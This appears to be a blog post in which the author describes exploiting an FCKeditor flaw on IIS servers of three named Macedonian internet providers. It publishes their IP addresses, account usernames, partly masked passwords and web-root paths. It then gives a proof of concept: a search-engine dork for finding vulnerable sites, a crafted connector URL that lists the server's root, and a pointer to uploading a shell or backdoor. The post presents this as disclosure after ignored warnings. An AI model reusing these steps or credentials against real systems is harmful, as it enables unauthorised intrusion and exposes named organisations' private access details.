1260 web sites… Can be HACKED for 5 min!
At June 10, 2010 I modified the published FLAW for FCKEDITOR to gain full root access to the 3 biggest Internet services providers in Macedonia. The hack was working on IIS Web Servers from Microsoft and a Exploited version of open source web based editor FCKEDITOR.
During a penetration test on a web site of our relative I discovered that the hosting server is not well secured. During the scans I discovered that owners of the web server are not informed about the exploit of FCKEDITOR in ASP platform. I contacted the authorities in all regular way to warm them about the exploits but nobody didn’t take my advice serious. After couple of mounts of waiting I released the information public on my BLOG and FACEBOK fun page. The funniest thing is that same flaws are still remains on that server after 2 years.
For a proof i released the username and password of the web server local administrator credentials marked with asterisk *.
Web server of NEOTEL
Platform: IIS Microsoft.
Ip: 80.77.144.13
user:IUSR_WEBSERVER
pass:GE|-TWRZc*****
domain:80 path:c:inetpubwwwroot
Full Read Write Execute access!
Web server of ULTRA
Platform:IIS Microsoft.
Ip:212.13.93-95
user:IUSR_APOLLO
pass:$rEM273#******
domain:80 path: D:wwweb
Full Read Write Execute access!
Web server of T-HOME
Platform:IIS Microsoft. |
Ip:195.26.152.200
user: IUSR_WEB3NEW
pass:d4O0Y)JT’*****
domain:80 path: c:inetpubwwwroot
Full Read Write Execute access!
Proof of concept:
To hack these servers you need to find a web site who is using a FCKEDITOR. For that you can use a google or other search engine with this option: site: MK inurl: FCKEDITOR
After that you need to test the url path of the FCKEDITOR with this modified function:
“browser.html?Type=/././&Connector=connectors/aspx/connector.aspx”
Like you can see here I am asking to list me the Root of the location where FCKEDITOR is installed with “/././” command and the result is this:
Like we can see here the upload manager of FCKEDITOR is ready to do rest for bad guys who can easy install some SHELL or other BACKDOOR tool on this web server finding a proper directory with “write” permission.
Resources I used for this hack is :
Leave a Reply